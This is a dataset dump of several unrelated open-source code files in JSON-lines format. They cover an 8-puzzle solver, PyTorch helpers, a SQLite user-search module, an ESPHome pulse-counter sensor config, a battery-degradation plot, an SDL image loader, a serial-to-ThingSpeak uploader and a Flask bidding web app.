print(\"\\n\")\r\n\r\n\r\ndef findNextStates(state):\r\n    list = []\r\n    list_states = []\r\n    for s in state:\r\n        list.append(s)\r\n    pos0 = list.index('0')\r\n    if pos0 == 0:\r\n        list_states.extend([swap(state, 0, 1), swap(state, 0, 3)]) # list[1], list[3]\r\n    elif pos0 == 1:\r\n        list_states.extend([swap(state, 1, 0), swap(state, 1, 2), swap(state, 1, 4)]) # 0 2 4\r\n    elif pos0 == 2:\r\n        list_states.extend([swap(state, 2, 1), swap(state, 2, 5)]) # 1 5\r\n    elif pos0 == 3:\r\n        list_states.extend([swap(state, 3, 0), swap(state, 3, 4), swap(state, 3, 6)]) # 0 4 6\r\n    elif pos0 == 4:\r\n        list_states.extend([swap(state, 4, 1), swap(state, 4, 3), swap(state, 4, 5), swap(state, 4, 7)]) # 1 3 5 7\r\n    elif pos0 == 5:\r\n        list_states.extend([swap(state, 5, 2), swap(state, 5, 4), swap(state, 5, 8)]) # 2 4 8\r\n    elif pos0 == 6:\r\n        list_states.extend([swap(state, 6, 3), swap(state, 6, 7)]) # 3 7\r\n    elif pos0 == 7:\r\n        list_states.extend([swap(state, 7, 4), swap(state, 7, 6), swap(state, 7, 8)]) # 4 6 8\r\n    elif pos0 == 8:\r\n        list_states.extend([swap(state, 8, 5), swap(state, 8, 7)]) # 5 7\r\n    return list_states\r\n\r\n\r\ndef swap(string1, a, b):\r\n    list = []\r\n    for s in string1:\r\n        list.append(s)\r\n    temp = list[a]\r\n    list[a] = list[b]\r\n    list[b] = temp\r\n    str = ''.join(list)\r\n    return str\r\n\r\n\r\nfinal_state = '012345678'\r\nbfs_len = possible_cases(final_state)\r\nprint(\"BFS: \", 
bfs_len)\r\n","repo_name":"2020ayao/8_puzzle","sub_path":"8_puzzle_EC.py","file_name":"8_puzzle_EC.py","file_ext":"py","file_size_in_byte":5089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"29383215935","text":"#!/usr/bin/python\n# -*- coding: UTF-8 -*-\n\n\nimport os\nimport torch\nfrom torch.autograd import Variable\nimport errno\nimport torch.distributed as dist\nimport math\nfrom functools import reduce\ndef make_folder(path, version):\n    if not os.path.exists(os.path.join(path, version)):\n        print(os.path.join(path, version))\n        os.makedirs(os.path.join(path, version))\n\n\ndef tensor2var(x, grad=False):\n    if torch.cuda.is_available():\n        x = x.cuda()\n    return Variable(x, requires_grad=grad)\n\ndef var2tensor(x):\n    return x.data.cpu()\n\ndef var2numpy(x):\n    return x.data.cpu().numpy()\n\ndef denorm(x):\n    out = (x + 1) / 2\n    return out.clamp_(0, 1)\n\ndef mkdir_p(dirname):\n    \"\"\" Like \"mkdir -p\", make a dir recursively, but do nothing if the dir exists\n    Args:\n        dirname(str):\n    \"\"\"\n    assert dirname is not None\n    if dirname == '' or os.path.isdir(dirname):\n        return\n    try:\n        os.makedirs(dirname)\n    except OSError as e:\n        if e.errno != errno.EEXIST:\n            raise e\n\n\ndef skipShardSplit(aList, drop_last=False, num_replicas=None, rank=None):\n    if not isinstance(aList, list) and not isinstance(aList, tuple):\n        aList = list(aList)\n\n    if num_replicas is None:\n        num_replicas = dist.get_world_size() if dist.is_initialized() else 1\n    if rank is None:\n        rank = dist.get_rank() if dist.is_initialized() else 0\n\n    num_replicas = num_replicas\n    rank = rank\n    drop_last = drop_last\n\n    if drop_last:\n        aList = aList[0: (len(aList) // num_replicas) * num_replicas]\n\n    # subsample\n    aList = aList[rank::num_replicas]\n\n    return aList\n\ndef mixb2a(a,b):\n    if len(b) > len(a):\n        a,b = b,a\n    if len(b) == 0:\n        return a\n    chunk_num = (len(b))\n    a_chunk = splitIntoChunk(a, chunk_num)\n    b_chunk = list(map(lambda x:[x],b))\n    return reduce(lambda x, y: x+y, [_a+_b for _a,_b in zip(a_chunk, b_chunk)])\n\ndef splitIntoChunk(aList, chunk_num):\n    return [aList[math.ceil(k * (len(aList) / chunk_num)):math.ceil((k + 1) * (len(aList) / chunk_num)):] for k in range(chunk_num)]","repo_name":"yinglinzheng/FTCN","sub_path":"utils/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":2082,"program_lang":"python","lang":"en","doc_type":"code","stars":76,"dataset":"github-code","pt":"67"} +{"seq_id":"30033886729","text":"from datetime import datetime\r\nimport sqlite3\r\n\r\n# Function to search for users matching a keyword\r\ndef search_users(conn, keyword, user_id):\r\n    if keyword == '':\r\n        print(\"no keyword to search for\")\r\n        return\r\n    # Create a cursor to interact with the database\r\n    cursor = conn.cursor()\r\n\r\n    # Execute an SQL query to search for users whose names contain the keyword\r\n    cursor.execute(\"\"\"\r\n        SELECT usr, name, city\r\n        FROM users\r\n        WHERE name LIKE ?\r\n        ORDER BY\r\n            CASE\r\n                WHEN name = ? THEN 0\r\n                ELSE LENGTH(name)\r\n            END\r\n        \"\"\", ('%' + keyword + '%', keyword,))\r\n    \r\n    # Fetch the search results for users with matching names\r\n    usersname = cursor.fetchall()\r\n\r\n    # Execute an SQL query to search for users whose cities and not names contain the keyword\r\n    cursor.execute(\"\"\"\r\n        SELECT usr, name, city\r\n        FROM users\r\n        WHERE city LIKE ? AND name NOT LIKE ?\r\n        ORDER BY\r\n            CASE\r\n                WHEN city = ? 
THEN 0\r\n ELSE LENGTH(city)\r\n END\r\n \"\"\", ('%' + keyword + '%','%' + keyword + '%',keyword))\r\n\r\n # Fetch the search results for users with matching cities but not names\r\n userscity = cursor.fetchall()\r\n\r\n # Combine the results from both name and city searches\r\n users = usersname + userscity\r\n\r\n # Check if any matching users were found\r\n if len(users) == 0:\r\n print(\"No matching users found.\")\r\n return\r\n\r\n count = 0\r\n # Display the first 5 matching users\r\n for i in range(count, min(count + 5, len(users))):\r\n print(f\"{i + 1}. Name: {users[i][1]}\")\r\n\r\n count += 5\r\n\r\n while True:\r\n # case when search results contain more than 5 matching users\r\n if len(users) > 5:\r\n choice = input(\"'0' to view more or Enter the number of a user to see more information or 'back' to go back: \")\r\n if choice == 'back':\r\n return\r\n # If there are more than 5 matching users, provide an option to view more\r\n elif choice == '0':\r\n if count >= len(users):\r\n print(\"No more users.\")\r\n continue\r\n # prints the next 5 users \r\n for i in range(count, min(count + 5, len(users))):\r\n print(f\"{i + 1}. Name: {users[i][1]}\")\r\n count += 5\r\n elif choice.isdigit():\r\n # check if selected user is valid\r\n if int(choice) > 0 and int(choice) < (len(users) + 1):\r\n try:\r\n selected_user = users[int(choice) - 1]\r\n\r\n # displays the information about selected user\r\n user_info = get_user_info(conn, selected_user[0])\r\n display_user_info(user_info)\r\n goback = False\r\n count2 = 3\r\n while not goback:\r\n # ask user if they want to follow user or view more tweeets\r\n follow = input(\"'0' to follow user, '1' to view more tweets, 'back' to go back: \")\r\n if follow == '0':\r\n # Check if the user is already following the selected user\r\n cursor.execute(\"SELECT * FROM follows WHERE flwer = ? AND flwee = ?\", (user_id, selected_user[0]))\r\n existing_follow = cursor.fetchone()\r\n\r\n if existing_follow:\r\n print(\"You are already following this user.\")\r\n goback = True\r\n else:\r\n # Insert a new follow record\r\n cursor.execute(\"INSERT INTO follows VALUES (?, ?, ?)\", (user_id, selected_user[0], datetime.now().strftime('%Y-%m-%d')))\r\n print(\"You are now following this user.\")\r\n conn.commit()\r\n goback = True\r\n # prints 3 more tweets\r\n elif follow == '1' and (user_info['tweet_count'] > 3):\r\n print_more_tweets(user_info, count2)\r\n count2 += 3\r\n elif follow == '1' and (user_info['tweet_count'] <= 3):\r\n print(\"no more tweets\")\r\n elif follow == 'back':\r\n goback = True\r\n else:\r\n print(\"Invalid choice. Please try again.\")\r\n except (ValueError, IndexError):\r\n print(\"Invalid choice. Please try again.\")\r\n else:\r\n print(\"Invalid choice. Please try again.\")\r\n else:\r\n print(\"Invalid choice. 
Please try again.\")\r\n\r\n # case when search results contain 5 of less matching users\r\n elif len(users) <= 5:\r\n choice = input(\"Enter the number of a user to see more information or 'back' to go back: \")\r\n if choice == 'back':\r\n return\r\n elif choice.isdigit():\r\n if int(choice) > 0 and int(choice) < (len(users) + 1):\r\n try:\r\n selected_user = users[int(choice) - 1]\r\n\r\n # displays the information about selected user\r\n user_info = get_user_info(conn, selected_user[0])\r\n display_user_info(user_info)\r\n goback = False\r\n count2 = 3\r\n while not goback:\r\n # ask user if they want to follow user or view more tweeets\r\n follow = input(\"'0' to follow user, '1' to view more tweets, 'back' to go back: \")\r\n if follow == '0':\r\n # Check if the user is already following the selected user\r\n cursor.execute(\"SELECT * FROM follows WHERE flwer = ? AND flwee = ?\", (user_id, selected_user[0]))\r\n existing_follow = cursor.fetchone()\r\n\r\n if existing_follow:\r\n print(\"You are already following this user.\")\r\n goback = True\r\n else:\r\n # Insert a new follow record\r\n cursor.execute(\"INSERT INTO follows VALUES (?, ?, ?)\", (user_id, selected_user[0], datetime.now().strftime('%Y-%m-%d')))\r\n print(\"You are now following this user.\")\r\n conn.commit()\r\n goback = True\r\n # prints 3 more tweets\r\n elif follow == '1' and (user_info['tweet_count'] > 3):\r\n print_more_tweets(user_info, count2)\r\n count2 += 3\r\n elif follow == '1' and (user_info['tweet_count'] <= 3):\r\n print(\"no more tweets\")\r\n elif follow == 'back':\r\n goback = True\r\n else:\r\n print(\"Invalid choice. Please try again.\")\r\n except (ValueError, IndexError):\r\n print(\"Invalid choice. Please try again.\")\r\n else:\r\n print(\"Invalid choice. Please try again.\")\r\n else:\r\n print(\"Invalid choice. 
Please try again.\")\r\n\r\n# Function to retrieve user information\r\ndef get_user_info(conn, user_id):\r\n cursor = conn.cursor()\r\n\r\n # Get the number of tweets posted by the user\r\n cursor.execute(\"SELECT COUNT(*) FROM tweets WHERE writer = ?\", (user_id,))\r\n tweet_count = cursor.fetchone()[0]\r\n\r\n # Get the number of users being followed by the user\r\n cursor.execute(\"SELECT COUNT(*) FROM follows WHERE flwer = ?\", (user_id,))\r\n following_count = cursor.fetchone()[0]\r\n\r\n # Get the number of followers of the user\r\n cursor.execute(\"SELECT COUNT(*) FROM follows WHERE flwee = ?\", (user_id,))\r\n followers_count = cursor.fetchone()[0]\r\n\r\n # Get up to 3 most recent tweets of the user\r\n cursor.execute(\"\"\"\r\n SELECT tid, writer, tdate, text\r\n FROM tweets\r\n WHERE writer = ?\r\n ORDER BY tdate DESC\r\n \"\"\", (user_id,))\r\n recent_tweets = cursor.fetchall()\r\n\r\n # Return the retrieved user information as a dictionary\r\n return {\r\n 'tweet_count': tweet_count,\r\n 'following_count': following_count,\r\n 'followers_count': followers_count,\r\n 'recent_tweets': recent_tweets,\r\n }\r\n\r\n# Function to display user information\r\ndef display_user_info(user_info):\r\n print(f\"Number of Tweets: {user_info['tweet_count']}\")\r\n print(f\"Number of Following: {user_info['following_count']}\")\r\n print(f\"Number of Followers: {user_info['followers_count']}\")\r\n\r\n if user_info['recent_tweets']:\r\n print(\"Recent Tweets:\")\r\n for i in range(0, min(3, len(user_info['recent_tweets']))):\r\n print(f\" Text: {user_info['recent_tweets'][i][3]}\")\r\n\r\n# Function to print more recent tweets for a user\r\ndef print_more_tweets(user_info, count):\r\n if count >= user_info['tweet_count']:\r\n print(\"No more tweets\")\r\n else:\r\n print(\"Recent Tweets:\")\r\n for i in range(count, min(count + 3, user_info['tweet_count'])):\r\n print(f\" Text: {user_info['recent_tweets'][i][3]}\")\r\n","repo_name":"CejiroR/Personal-Projects","sub_path":"Twitter like Social Media Platform Project/search_users.py","file_name":"search_users.py","file_ext":"py","file_size_in_byte":9895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"42105718957","text":"import esphome.codegen as cg\nimport esphome.config_validation as cv\nfrom esphome import pins\nfrom esphome.components import sensor\nfrom esphome.const import (\n CONF_COUNT_MODE,\n CONF_FALLING_EDGE,\n CONF_ID,\n CONF_INTERNAL_FILTER,\n CONF_PIN,\n CONF_RISING_EDGE,\n CONF_NUMBER,\n CONF_TOTAL,\n ICON_PULSE,\n STATE_CLASS_MEASUREMENT,\n STATE_CLASS_TOTAL_INCREASING,\n UNIT_PULSES_PER_MINUTE,\n UNIT_PULSES,\n)\nfrom esphome.core import CORE\n\npulse_counter_ns = cg.esphome_ns.namespace(\"pulse_counter\")\nPulseCounterCountMode = pulse_counter_ns.enum(\"PulseCounterCountMode\")\nCOUNT_MODES = {\n \"DISABLE\": PulseCounterCountMode.PULSE_COUNTER_DISABLE,\n \"INCREMENT\": PulseCounterCountMode.PULSE_COUNTER_INCREMENT,\n \"DECREMENT\": PulseCounterCountMode.PULSE_COUNTER_DECREMENT,\n}\n\nCOUNT_MODE_SCHEMA = cv.enum(COUNT_MODES, upper=True)\n\nPulseCounterSensor = pulse_counter_ns.class_(\n \"PulseCounterSensor\", sensor.Sensor, cg.PollingComponent\n)\n\n\ndef validate_internal_filter(value):\n value = cv.positive_time_period_microseconds(value)\n if CORE.is_esp32:\n if value.total_microseconds > 13:\n raise cv.Invalid(\"Maximum internal filter value for ESP32 is 13us\")\n return value\n\n return value\n\n\ndef validate_pulse_counter_pin(value):\n value = 
pins.internal_gpio_input_pin_schema(value)\n if CORE.is_esp8266 and value[CONF_NUMBER] >= 16:\n raise cv.Invalid(\n \"Pins GPIO16 and GPIO17 cannot be used as pulse counters on ESP8266.\"\n )\n return value\n\n\ndef validate_count_mode(value):\n rising_edge = value[CONF_RISING_EDGE]\n falling_edge = value[CONF_FALLING_EDGE]\n if rising_edge == \"DISABLE\" and falling_edge == \"DISABLE\":\n raise cv.Invalid(\n \"Can't set both count modes to DISABLE! This means no counting occurs at \"\n \"all!\"\n )\n return value\n\n\nCONFIG_SCHEMA = (\n sensor.sensor_schema(\n unit_of_measurement=UNIT_PULSES_PER_MINUTE,\n icon=ICON_PULSE,\n accuracy_decimals=2,\n state_class=STATE_CLASS_MEASUREMENT,\n )\n .extend(\n {\n cv.GenerateID(): cv.declare_id(PulseCounterSensor),\n cv.Required(CONF_PIN): validate_pulse_counter_pin,\n cv.Optional(\n CONF_COUNT_MODE,\n default={\n CONF_RISING_EDGE: \"INCREMENT\",\n CONF_FALLING_EDGE: \"DISABLE\",\n },\n ): cv.All(\n cv.Schema(\n {\n cv.Required(CONF_RISING_EDGE): COUNT_MODE_SCHEMA,\n cv.Required(CONF_FALLING_EDGE): COUNT_MODE_SCHEMA,\n }\n ),\n validate_count_mode,\n ),\n cv.Optional(CONF_INTERNAL_FILTER, default=\"13us\"): validate_internal_filter,\n cv.Optional(CONF_TOTAL): sensor.sensor_schema(\n unit_of_measurement=UNIT_PULSES,\n icon=ICON_PULSE,\n accuracy_decimals=0,\n state_class=STATE_CLASS_TOTAL_INCREASING,\n ),\n }\n )\n .extend(cv.polling_component_schema(\"60s\"))\n)\n\n\nasync def to_code(config):\n var = cg.new_Pvariable(config[CONF_ID])\n await cg.register_component(var, config)\n await sensor.register_sensor(var, config)\n\n pin = await cg.gpio_pin_expression(config[CONF_PIN])\n cg.add(var.set_pin(pin))\n count = config[CONF_COUNT_MODE]\n cg.add(var.set_rising_edge_mode(count[CONF_RISING_EDGE]))\n cg.add(var.set_falling_edge_mode(count[CONF_FALLING_EDGE]))\n cg.add(var.set_filter_us(config[CONF_INTERNAL_FILTER]))\n\n if CONF_TOTAL in config:\n sens = await sensor.new_sensor(config[CONF_TOTAL])\n cg.add(var.set_total_sensor(sens))\n","repo_name":"natelust/esphomeZephyr","sub_path":"esphome/components/pulse_counter/sensor.py","file_name":"sensor.py","file_ext":"py","file_size_in_byte":3755,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"67"} +{"seq_id":"4527909294","text":"## @ingroup Visualization-Geometry-Three_Dimensional\n# RCAIDE/Visualization/Performance/Energy/Battery/plot_battery_degradation.py\n# \n# \n# Created: Jul 2023, M. 
Clarke\n\n# ----------------------------------------------------------------------------------------------------------------------\n# IMPORT\n# ---------------------------------------------------------------------------------------------------------------------- \nfrom RCAIDE.Core import Units\nfrom RCAIDE.Visualization.Common import set_axes, plot_style \nimport matplotlib.pyplot as plt\nimport matplotlib.cm as cm\nimport numpy as np \n\n# ----------------------------------------------------------------------------------------------------------------------\n# PLOTS\n# ---------------------------------------------------------------------------------------------------------------------- \n## @ingroup Visualization-Performance-Energy-Battery\ndef plot_battery_degradation(results,\n save_figure = False,\n line_color = 'bo-',\n line_color2 = 'rs--',\n save_filename = \"Battery_Degradation\",\n file_type = \".png\",\n width = 12, height = 7):\n \"\"\"This plots the solar flux and power train performance of an solar powered aircraft\n\n Assumptions:\n None\n \n Source:\n None \n \n Inputs:\n results.segments.conditions.propulsion\n solar_flux\n battery_power_draw\n battery_energy\n \n Outputs:\n Plots\n \n Properties Used:\n N/A\n \"\"\" \n # get plotting style \n ps = plot_style() \n\n parameters = {'axes.labelsize': ps.axis_font_size,\n 'xtick.labelsize': ps.axis_font_size,\n 'ytick.labelsize': ps.axis_font_size,\n 'axes.titlesize': ps.title_font_size}\n plt.rcParams.update(parameters)\n \n\n for network in results.segments[0].analyses.energy.networks: \n busses = network.busses\n for bus in busses: \n for battery in bus.batteries: \n fig = plt.figure(save_filename + '_' + battery.tag)\n fig.set_size_inches(width,height) \n num_segs = len(results.segments)\n time_hrs = np.zeros(num_segs) \n capacity_fade = np.zeros_like(time_hrs)\n resistance_growth = np.zeros_like(time_hrs)\n cycle_day = np.zeros_like(time_hrs)\n charge_throughput = np.zeros_like(time_hrs) \n \n for i in range(len(results.segments)): \n time_hrs[i] = results.segments[i].conditions.frames.inertial.time[-1,0] / Units.hour \n battery_conditions = results.segments[i].conditions.energy[bus.tag][battery.tag] \n cycle_day[i] = battery_conditions.cell.cycle_in_day\n capacity_fade[i] = battery_conditions.cell.capacity_fade_factor\n resistance_growth[i] = battery_conditions.cell.resistance_growth_factor\n charge_throughput[i] = battery_conditions.cell.charge_throughput[-1,0] \n \n axis_1 = plt.subplot(3,2,1)\n axis_1.plot(charge_throughput, capacity_fade, color = ps.color , marker = ps.markers[0], linewidth = ps.line_width ) \n axis_1.set_ylabel('$E/E_0$')\n axis_1.set_xlabel('Ah')\n set_axes(axis_1) \n \n axis_2 = plt.subplot(3,2,3)\n axis_2.plot(time_hrs, capacity_fade, color = ps.color, marker = ps.markers[0], linewidth = ps.line_width ) \n axis_2.set_ylabel('$E/E_0$')\n axis_2.set_xlabel('Time (hrs)')\n set_axes(axis_2) \n \n axis_3 = plt.subplot(3,2,5)\n axis_3.plot(cycle_day, capacity_fade, color = ps.color, marker = ps.markers[0], linewidth = ps.line_width ) \n axis_3.set_ylabel('$E/E_0$')\n axis_3.set_xlabel('Time (days)')\n set_axes(axis_3) \n \n axis_4 = plt.subplot(3,2,2) \n axis_4.plot(charge_throughput, resistance_growth, color = ps.color, marker = ps.markers[0], linewidth = ps.line_width )\n axis_4.set_ylabel('$R/R_0$')\n axis_4.set_xlabel('Ah')\n set_axes(axis_4) \n \n axis_5 = plt.subplot(3,2,4) \n axis_5.plot(time_hrs, resistance_growth, color = ps.color, marker = ps.markers[0], linewidth = ps.line_width )\n 
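# resistance growth factor R/R0 plotted against cumulative mission time in hours\n                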
axis_5.set_ylabel('$R/R_0$')\n axis_5.set_xlabel('Time (hrs)')\n set_axes(axis_5) \n \n axis_6 = plt.subplot(3,2,6) \n axis_6.plot(cycle_day, resistance_growth, color = ps.color, marker = ps.markers[0], linewidth = ps.line_width )\n axis_6.set_ylabel('$R/R_0$')\n axis_6.set_xlabel('Time (days)')\n set_axes(axis_6) \n \n # set title of plot \n title_text = 'Battery Cell Degradation: ' + battery.tag \n fig.suptitle(title_text) \n \n plt.tight_layout() \n if save_figure: \n fig.savefig(save_filename + '_'+ battery.tag + file_type) \n \n return fig \n\n","repo_name":"leadsgroup/RCAIDE_UIUC","sub_path":"RCAIDE/Visualization/Energy/Battery/plot_battery_degradation.py","file_name":"plot_battery_degradation.py","file_ext":"py","file_size_in_byte":5498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"67"} +{"seq_id":"1740972381","text":"#!/usr/bin/python\n\nimport sdl2\nimport pygame2\n\nfrom sdl2.ext.common import SDLError\nfrom sdl2.ext.compat import UnsupportedError, byteify\nfrom sdl2 import endian, surface, pixels\n\n_HASPIL = True\nfrom PIL import Image\n\n\ndef load(filename):\n if not pygame2.display.window:\n raise Exception(\"Error: Window has not yet been created.\")\n\n # Load the image using PIL so we get the SDL surface and PIL object.\n surface, pil_surface = load_image(filename)\n\n # Create a sprite.\n sprite = pygame2.display.window.factory.from_surface(surface)\n sprite.angle = 0\n sprite.pil = pil_surface\n\n # If we're using a software renderer, keep an original for rotation.\n if pygame2.display.window.type == \"software\":\n sprite.original = pygame2.display.window.factory.from_surface(surface, True)\n sprite.original.pil = pil_surface\n # If we're using a texture renderer, keep a software copy of the surface.\n else:\n sprite.sw_sprite = pygame2.display.window.sw_factory.from_surface(surface, True)\n sprite.sw_sprite.pil = pil_surface\n\n image = pygame2.Surface(sprite=sprite)\n\n return image\n\n\n\n\ndef load_image(fname, enforce=None):\n \"\"\"Creates a SDL_Surface from an image file.\n\n ** This is an altered version of the load_image method from pysdl2.\n\n This function makes use of the Python Imaging Library, if it is available\n on the target execution environment. The function will try to load the\n file via sdl2 first. 
If the file could not be loaded, it will try\n to load it via sdl2.sdlimage and PIL.\n\n You can force the function to use only one of them, by passing the enforce\n as either \"PIL\" or \"SDL\".\n\n Note: This will call sdl2.sdlimage.init() implicitly with the default\n arguments, if the module is available and if sdl2.SDL_LoadBMP() failed to\n load the image.\n\n fname can be either a string of the file to load or a PIL image object.\n\n \"\"\"\n\n if enforce is not None and enforce not in (\"PIL\", \"SDL\"):\n raise ValueError(\"enforce must be either 'PIL' or 'SDL', if set\")\n\n if type(fname) is str:\n name = byteify(fname, \"utf-8\")\n\n if enforce == \"PIL\" and not _HASPIL:\n raise UnsupportedError(load_image, \"cannot use PIL (not found)\")\n\n imgsurface = None\n\n if enforce != \"SDL\" and _HASPIL and not imgsurface:\n if type(fname) is str:\n image = Image.open(fname)\n else:\n image = fname\n mode = image.mode\n width, height = image.size\n rmask = gmask = bmask = amask = 0\n if mode in (\"1\", \"L\", \"P\"):\n # 1 = B/W, 1 bit per byte\n # \"L\" = greyscale, 8-bit\n # \"P\" = palette-based, 8-bit\n pitch = width\n depth = 8\n elif mode == \"RGB\":\n # 3x8-bit, 24bpp\n if endian.SDL_BYTEORDER == endian.SDL_LIL_ENDIAN:\n rmask = 0x0000FF\n gmask = 0x00FF00\n bmask = 0xFF0000\n else:\n rmask = 0xFF0000\n gmask = 0x00FF00\n bmask = 0x0000FF\n depth = 24\n pitch = width * 3\n elif mode in (\"RGBA\", \"RGBX\"):\n # RGBX: 4x8-bit, no alpha\n # RGBA: 4x8-bit, alpha\n if endian.SDL_BYTEORDER == endian.SDL_LIL_ENDIAN:\n rmask = 0x000000FF\n gmask = 0x0000FF00\n bmask = 0x00FF0000\n if mode == \"RGBA\":\n amask = 0xFF000000\n else:\n rmask = 0xFF000000\n gmask = 0x00FF0000\n bmask = 0x0000FF00\n if mode == \"RGBA\":\n amask = 0x000000FF\n depth = 32\n pitch = width * 4\n else:\n # We do not support CMYK or YCbCr for now\n raise TypeError(\"unsupported image format\")\n\n pxbuf = image.tostring()\n imgsurface = surface.SDL_CreateRGBSurfaceFrom(pxbuf, width, height,\n depth, pitch, rmask,\n gmask, bmask, amask)\n if not imgsurface:\n raise SDLError()\n imgsurface = imgsurface.contents\n # the pixel buffer must not be freed for the lifetime of the surface\n imgsurface._pxbuf = pxbuf\n\n if mode == \"P\":\n # Create a SDL_Palette for the SDL_Surface\n def _chunk(seq, size):\n for x in range(0, len(seq), size):\n yield seq[x:x + size]\n\n rgbcolors = image.getpalette()\n sdlpalette = pixels.SDL_AllocPalette(len(rgbcolors) // 3)\n if not sdlpalette:\n raise SDLError()\n sdlpalette = sdlpalette.contents\n SDL_Color = pixels.SDL_Color\n for idx, (r, g, b) in enumerate(_chunk(rgbcolors, 3)):\n sdlpalette.colors[idx] = SDL_Color(r, g, b)\n ret = surface.SDL_SetSurfacePalette(imgsurface, sdlpalette)\n # This will decrease the refcount on the palette, so it gets\n # freed properly on releasing the SDL_Surface.\n pixels.SDL_FreePalette(sdlpalette)\n if ret != 0:\n raise SDLError()\n\n return imgsurface, image\n","repo_name":"ShadowApex/pygame-sdl2","sub_path":"pygame2/image/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5266,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"67"} +{"seq_id":"13629214868","text":"#Irene Stone\r\n#Accessing thingSpeak from Thonny\r\n#Sept 2023\r\n\r\nimport time\r\nimport serial\r\nimport urllib.request\r\nser = serial.Serial()\r\nser.baudrate = 115200\r\nser.port = \"COM5\"\r\nser.open()\r\nwhile True:\r\n data1 = str(ser.readline())\r\n data1 = data1.replace(\"b\",\"\")\r\n data1 = 
data1.replace(\"'\",\"\")\r\n    data1 = data1.replace(\"\\\\r\", \"\").replace(\"\\\\n\", \"\") # Remove \\r and \\n\r\n# data1 = data1.replace(\"celsius:\",\"\") #when using radio\r\n    time.sleep(5)\r\n    print(data1)\r\n    msg = data1\r\n    \r\n    b=urllib.request.urlopen('https://api.thingspeak.com/update?api_key=BIZPFWPP6YGOAVHR&field1='+msg)\r\n\r\nser.close()\r\n","repo_name":"pdst-lccs/NW5","sub_path":"part5_mbToThonnyToThingSpeak.py","file_name":"part5_mbToThonnyToThingSpeak.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"38221017328","text":"from flask import render_template, redirect, jsonify\nfrom flask import request\nfrom flask_login import login_user, logout_user, login_required, current_user\nfrom app import app\nfrom app.models import User, Database, load_user\nimport json\nfrom . import mysql\n\n@app.route('/')\n@app.route('/index')\ndef index():\n\treturn render_template(\"index.html\")\n\n@app.route('/about')\ndef about():\n\treturn render_template(\"about.html\")\n\n@app.route('/signup',methods=['GET','POST'])\ndef signup():\n\tif request.method == 'GET':\n\t\treturn render_template(\"register.html\")\n\telse:\n\t\t#verify details\n\t\tdata = request.get_json()\n\t\tprint(data)\n\t\tif Database.addUser(data):\n\t\t\treturn \"User added successfully\"\n\t\telse:\n\t\t\treturn \"Error\",401\n\n@app.route('/login', methods=['POST'])\ndef login():\n\tdata = request.get_json()\n\tusername = data['username']\n\tpassword = data['password']\n\t#verify user\n\tif Database.login(username, password):\n\t\tuser = load_user(username)\n\t\tlogin_user(user)\n\t\treturn redirect(\"/user/\"+username)\n\telse:\n\t\treturn \"Incorrect credentials. Please try again.\",401\n\n@app.route(\"/getUser\")\n@login_required\ndef getUser():\n\treturn current_user.username\n\n@app.route(\"/logout\")\n@login_required\ndef logout():\n\tlogout_user()\n\treturn redirect(\"/\")\n\n@app.route(\"/user/<username>\")\n@login_required\ndef home(username):\n\tdata = Database.getUser(username)\n\treturn jsonify(data[1])\n\n\t\n@app.route(\"/bids/<pname>\")\ndef bids(pname):\n\t#fetch details of pname and send it in this json\n\tproject = {'name':pname}\n\treturn render_template('bid.html', project = project)\n\t\n@app.route(\"/makebid/<pname>\")\ndef makebid(pname):\n\t#get required details needed for the project and accordingly populate the form queries\n\tproject = {'name':pname}\n\treturn render_template('makebid.html', project = project)\n\t\n@app.route(\"/bidplaced\", methods=['POST'])\ndef bidplaced():\n\treturn \"A\"\n\n@app.route(\"/search\")\ndef search():\n\treturn render_template('search.html',method=request.args.get('method'),data=request.args.get('text'))\n\t\n@app.route(\"/search_by\", methods=['POST'])\ndef search_by():\n\tmethod = request.json['method']\n\ttext = request.json['text']\n\tprint(method,text)\n\tdata = Database.search_by({'method':method, 'data':text})\n\tprint(data)\n\tif len(data)==0:\n\t    return \"No Entries found\",401\n\treturn data\n\n@app.route(\"/addproject\", methods=['POST'])\n@login_required\ndef addProject():\n\tif current_user.access == \"admin\":\n\t\tprojDetails = request.get_json()\n\t\t#verify Data parameters\n\t\tif Database.addProject(projDetails):\n\t\t#if successful\n\t\t\treturn \"Data saved successfully\"\n\t\telse:\n\t\t\treturn \"Error saving data\"\n\treturn \"Access denied\",401\n'''\n@app.route(\"/project/id/<int:id>\", methods=['GET'])\ndef showProject(id):\n\tdata = Database.getProject(project)\n\tif 
data is not False:\n\t\treturn jsonify(data)\n\telse:\n\t\treturn \"Project not found\"\n'''\n\n@app.route('/project/title/<pname>', methods=['GET'])\ndef disp_project(pname):\n\t#get project by project name\n\tdata = list(Database.getProject(pname))\n\tupdates=[]\n\ttenders=[]\n\tprint(data)\n\tif (current_user.access == \"admin\"):\n\t\tif(data[-1]=='a'):#if allocated send updates and specify type\n\t\t\ttype='a'\n\t\telse:#else send tenders and specify type\n\t\t\ttype='w'\n\t\t\t#tenders = Database.\n\t\t\t\n\telse:\n\t\t#dont send data but send 'contractor' as type\n\t\ttype='c'\n\tprint(type)\n\treturn render_template('proj_info.html', project = data, type= type, updates=updates, tenders=tenders)\n\t\n@app.route('/check', methods=['POST'])\ndef checkbid():\n\tdata = {'tender_id':5,'vender_id':6,'date':\"c\",'cost':10,'project_id':10}\n\tDatabase.addBid(data)\n\treturn \"asda\"\n\n@app.route('/admin', methods=['GET'])\n@login_required\ndef admin():\n    if not (current_user.access == \"admin\"):\n        return \"Access Denied\",401\n    return render_template('admin.html',method=request.args.get('method'),data=request.args.get('text'))\n\n@app.route('/load_proj_data', methods=['POST'])\ndef load_proj_data():\n\tstatus = request.json['status']\n\tdata = Database.getAlloProject(status)\t\n\tprint((data))\n\treturn jsonify(list(data))\n\n@app.route('/contractor/<uname>', methods=['GET'])\n@login_required\ndef contractor(uname):\n    if current_user.access == \"admin\" or current_user.username == uname:\n        data = Database.getContractor(uname)\n        if len(data)==0:\n            return \"User not found\",404\n        return 